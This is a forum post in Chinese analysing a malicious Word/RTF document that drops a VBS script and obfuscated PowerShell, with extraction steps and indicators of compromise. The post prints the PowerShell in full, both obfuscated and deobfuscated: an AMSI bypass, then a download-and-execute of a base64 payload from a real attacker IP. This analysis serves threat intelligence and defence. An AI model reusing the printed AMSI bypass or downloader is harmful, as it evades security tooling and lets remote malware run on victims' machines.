• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

某word恶意VBA样本分析


This Wind

Recommended Posts

前言

在群里看到的一个样本。打算分析一下
样本来源:https://app.any.run/tasks/9f3895b5-6ae1-4ac1-b829-b50202985e3d/#

过程

winhex打开文档发现是rtf文件

yZAnpQ.png

利用oletools套件里的rtfobj查看

yZAsAK.png

dump出vbs

rtfobj -s all invoice.doc
  • 1
yZALcj.png

Client.vbs:https://paste.ubuntu.com/p/v74cHNShTq/
由于给出的比较混乱加上app.any.run给出的执行过程,大概一句话:
根据判断使用wscript或powershell执行上线

powershell command分析

[Ref].Assembly.GetType('Sy' + 'stem.' + 'Mana' + 'gem' + 'ent' + '.Autom' + 'atio' + 'n.A' + 'm' + 'si' + 'Utils');
\n$835FFE1926 = '4456625220575263174452554847';
\n$9FE0AD5C66 = [string](0..13|% {
    [char][int](53 + ($835FFE1926).substring(($_ * 2), 2))
}) - replace ' ';
$58FB808063 = $8B0111F552.GetField($9FE0AD5C66, 'Non^^^'.replace('^^^', 'Pub') + 'lic,S' + 'tatic');
$58FB808063.SetValue($null, $true);
($A72F9B815A = $A72F9B815A = Write - Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');
$747586859599494838475575854949393847584855 = @(91, 82, 101, 102, 93, 46, 65, 115, 115, 101, 109, 98, 108, 121, 46, 71, 101, 116, 84, 121, 112, 101, 40, 39, 83, 121, 39, 43, 39, 115, 116, 101, 109, 46, 39, 43, 39, 77, 97, 110, 97, 39, 43, 39, 103, 101, 109, 39, 43, 39, 101, 110, 116, 39, 43, 39, 46, 65, 117, 116, 111, 109, 39, 43, 39, 97, 116, 105, 111, 39, 43, 39, 110, 46, 39, 43, 36, 40, 91, 67, 72, 65, 114, 93, 40, 57, 56, 45, 51, 51, 41, 43, 91, 99, 72, 65, 114, 93, 40, 49, 50, 52, 45, 49, 53, 41, 43, 91, 99, 104, 65, 82, 93, 40, 49, 49, 53, 41, 43, 91, 67, 72, 97, 82, 93, 40, 91, 66, 89, 116, 101, 93, 48, 120, 54, 57, 41, 41, 43, 39, 85, 116, 105, 108, 115, 39, 41, 46, 71, 101, 116, 70, 105, 101, 108, 100, 40, 36, 40, 91, 67, 104, 65, 114, 93, 40, 91, 98, 121, 116, 101, 93, 48, 120, 54, 49, 41, 43, 91, 99, 104, 97, 82, 93, 40, 91, 98, 89, 116, 69, 93, 48, 120, 54, 68, 41, 43, 91, 99, 104, 97, 114, 93, 40, 91, 98, 121, 84, 101, 93, 48, 120, 55, 51, 41, 43, 91, 99, 104, 65, 114, 93, 40, 49, 49, 48, 45, 53, 41, 43, 91, 99, 104, 65, 82, 93, 40, 91, 66, 89, 84, 69, 93, 48, 120, 52, 57, 41, 43, 91, 99, 72, 97, 82, 93, 40, 57, 54, 56, 48, 47, 56, 56, 41, 43, 91, 99, 72, 97, 82, 93, 40, 49, 48, 53, 41, 43, 91, 67, 104, 97, 114, 93, 40, 91, 98, 89, 116, 101, 93, 48, 120, 55, 52, 41, 43, 91, 67, 104, 97, 114, 93, 40, 91, 66, 89, 84, 69, 93, 48, 120, 52, 54, 41, 43, 91, 99, 104, 97, 114, 93, 40, 49, 52, 56, 45, 53, 49, 41, 43, 91, 99, 72, 65, 82, 93, 40, 57, 53, 53, 53, 47, 57, 49, 41, 43, 91, 67, 104, 65, 82, 93, 40, 49, 48, 56, 41, 43, 91, 67, 104, 65, 114, 93, 40, 54, 50, 54, 50, 47, 54, 50, 41, 43, 91, 67, 104, 65, 82, 93, 40, 91, 98, 89, 84, 69, 93, 48, 120, 54, 52, 41, 41, 44, 39, 78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 83, 116, 97, 116, 105, 99, 39, 41, 46, 83, 101, 116, 86, 97, 108, 117, 101, 40, 36, 110, 117, 108, 108, 44, 36, 116, 114, 117, 101, 41, 59, 40, 36, 49, 68, 55, 56, 53, 70, 50, 56, 53, 67, 61, 36, 49, 68, 55, 56, 53, 70, 50, 56, 53, 67, 61, 87, 114, 105, 116, 101, 45, 72, 111, 115, 116, 32, 39, 69, 67, 52, 65, 65, 66, 53, 56, 48, 56, 50, 50, 51, 69, 66, 55, 50, 50, 70, 57, 67, 50, 48, 54, 51, 69, 68, 48, 53, 54, 54, 54, 53, 65, 65, 56, 48, 65, 67, 53, 54, 53, 56, 70, 57, 68, 48, 54, 56, 49, 53, 55, 50, 48, 55, 53, 57, 67, 51, 69, 66, 52, 67, 52, 66, 55, 48, 54, 53, 55, 50, 52, 67, 51, 68, 69, 70, 65, 54, 51, 68, 69, 66, 53, 56, 70, 67, 51, 70, 65, 57, 68, 50, 50, 49, 50, 49, 54, 55, 52, 39, 41, 59, 100, 111, 32, 123, 36, 112, 105, 110, 103, 32, 61, 32, 116, 101, 115, 116, 45, 99, 111, 110, 110, 101, 99, 116, 105, 111, 110, 32, 45, 99, 111, 109, 112, 32, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 32, 45, 99, 111, 117, 110, 116, 32, 49, 32, 45, 81, 117, 105, 101, 116, 125, 32, 117, 110, 116, 105, 108, 32, 40, 36, 112, 105, 110, 103, 41, 59, 36, 66, 54, 55, 54, 56, 48, 65, 69, 49, 54, 32, 61, 32, 91, 69, 110, 117, 109, 93, 58, 58, 84, 111, 79, 98, 106, 101, 99, 116, 40, 91, 83, 121, 115, 116, 101, 109, 46, 78, 101, 116, 46, 83, 101, 99, 117, 114, 105, 116, 121, 80, 114, 111, 116, 111, 99, 111, 108, 84, 121, 112, 101, 93, 44, 32, 51, 48, 55, 50, 41, 59, 91, 83, 121, 115, 116, 101, 109, 46, 78, 101, 116, 46, 83, 101, 114, 118, 105, 99, 101, 80, 111, 105, 110, 116, 77, 97, 110, 97, 103, 101, 114, 93, 58, 58, 83, 101, 99, 117, 114, 105, 116, 121, 80, 114, 111, 116, 111, 99, 111, 108, 32, 61, 32, 36, 66, 54, 55, 54, 56, 48, 65, 69, 49, 54, 59, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 61, 32, 78, 101, 119, 45, 79, 98, 106, 101, 99, 116, 32, 45, 67, 111, 109, 32, 77, 105, 99, 114, 111, 115, 111, 102, 116, 46, 88, 77, 76, 72, 84, 84, 80, 59, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 46, 111, 112, 101, 110, 40, 39, 71, 69, 84, 39, 44, 39, 104, 116, 116, 112, 58, 47, 47, 49, 48, 56, 46, 54, 49, 46, 49, 54, 54, 46, 49, 49, 47, 109, 47, 102, 105, 110, 101, 46, 106, 112, 103, 39, 44, 36, 102, 97, 108, 115, 101, 41, 59, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 46, 115, 101, 110, 100, 40, 41, 59, 36, 54, 55, 52, 69, 49, 54, 53, 67, 56, 51, 61, 91, 84, 101, 120, 116, 46, 69, 110, 99, 111, 100, 105, 110, 103, 93, 58, 58, 39, 85, 84, 70, 56, 39, 46, 39, 71, 101, 116, 83, 116, 114, 105, 110, 103, 39, 40, 91, 67, 111, 110, 118, 101, 114, 116, 93, 58, 58, 39, 70, 114, 111, 109, 66, 97, 115, 101, 54, 52, 83, 116, 114, 105, 110, 103, 39, 40, 36, 69, 55, 68, 69, 65, 56, 68, 66, 48, 51, 46, 114, 101, 115, 112, 111, 110, 115, 101, 84, 101, 120, 116, 41, 41, 124, 73, 96, 69, 96, 88);
[System.Text.Encoding]::ASCII.GetString($747586859599494838475575854949393847584855)|I`E`X

 

1.首先利用System.Management.Automation.AmsiUtils状态,将检测的语句设置为null。bypass AMI
2.将ascii解码利用IEX执行

去混淆分析

[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.'+$([CHAr](98-33)+[cHAr](124-15)+[chAR](115)+[
CHaR]([BYte]0x69))+'Utils').GetField($([ChAr]([byte]0x61)+[chaR]([bYtE]0x6D)+[char]([byTe]0x73)+[chAr](110-5)+[chAR]([BY
TE]0x49)+[cHaR](9680/88)+[cHaR](105)+[Char]([bYte]0x74)+[Char]([BYTE]0x46)+[char](148-51)+[cHAR](9555/91)+[ChAR](108)+[C
hAr](6262/62)+[ChAR]([bYTE]0x64)),'NonPublic,Static').SetValue($null,$true);
($1D785F285C=$1D785F285C=Write-Host 'EC4AAB5
808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');
do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping); #判断google能否ping通
$B67680AE16 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
[System.Net.ServicePointManager]::SecurityProtocol = $B67680AE16;
$E7DEA8DB03= New-Object -Com Microsoft.XMLHTTP;
$E7D
EA8DB03.open('GET','http://108.61.166.11/m/fine.jpg',$false);
$E7DEA8DB03.send();
$674E165C83=[Text.Encoding]::'UTF8'.'Get
String'([Convert]::'FromBase64String'($E7DEA8DB03.responseText))|I`E`X #远程下载执行

1.利用System.Management.Automation.AmsiUtils状态,将检测的语句设置为null。bypass AMI
2.发一个包检测能否连接google.com,如果不成功则重复检测
3.远程下载http://108.61.166.11/m/fine.jpg base64解码运行

fine.jpg

yA8V41.png

经过base64解码得到一下code

yA8YCt.png
yA8wDg.png


1.一如既往的利用System.Management.Automation.AmsiUtils状态,将检测的语句设置为null。bypass AMI
2.将@00替换为0x
3.利用[System.Reflection.Assembly]::Load加载带有基于通用对象文件格式 (COFF) 的映像的程序集,该映像包含已发出的程序集。 此程序集将会加载到调用方的应用程序域中。
4.利用Assembly.Load加载IMAGE_NT_HEADERS变量里的dll,然后调用Quoting类里的SplitUnquoted函数将$ZOIOXMAUI??KDWXAMKYEC参数传入

提取出来的dll如下

yEYIk4.md.png

根据app.any.run给出的标签属于trojan家族的

Quoting类里的SplitUnquoted函数

yEaSNF.png

最后所有提取出来的文件

yZEpNT.png

IOCS:
Main object- “mal0129-01.zip”
sha256 00789a46bbe5d6537f0b2ebb23a006d51c18752f13c1fac475f39b7e8e0431a4
sha1 3e70416110eca3a4dda6a28e929413193fa008b4
md5 e26e82db7083a2559ecfe147c7696cb9
Connections
ip 108.61.166.11
HTTP/HTTPS requests
url http://108.61.166.11/m/fine.jpg

微步社区

yAGdRx.png

参考链接

https://app.any.run/tasks/9f3895b5-6ae1-4ac1-b829-b50202985e3d/#
https://docs.microsoft.com/zh-cn/dotnet/api/system.reflection.assembly.load?view=net-5.0
https://blog.csdn.net/csdndscs/article/details/103946972
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now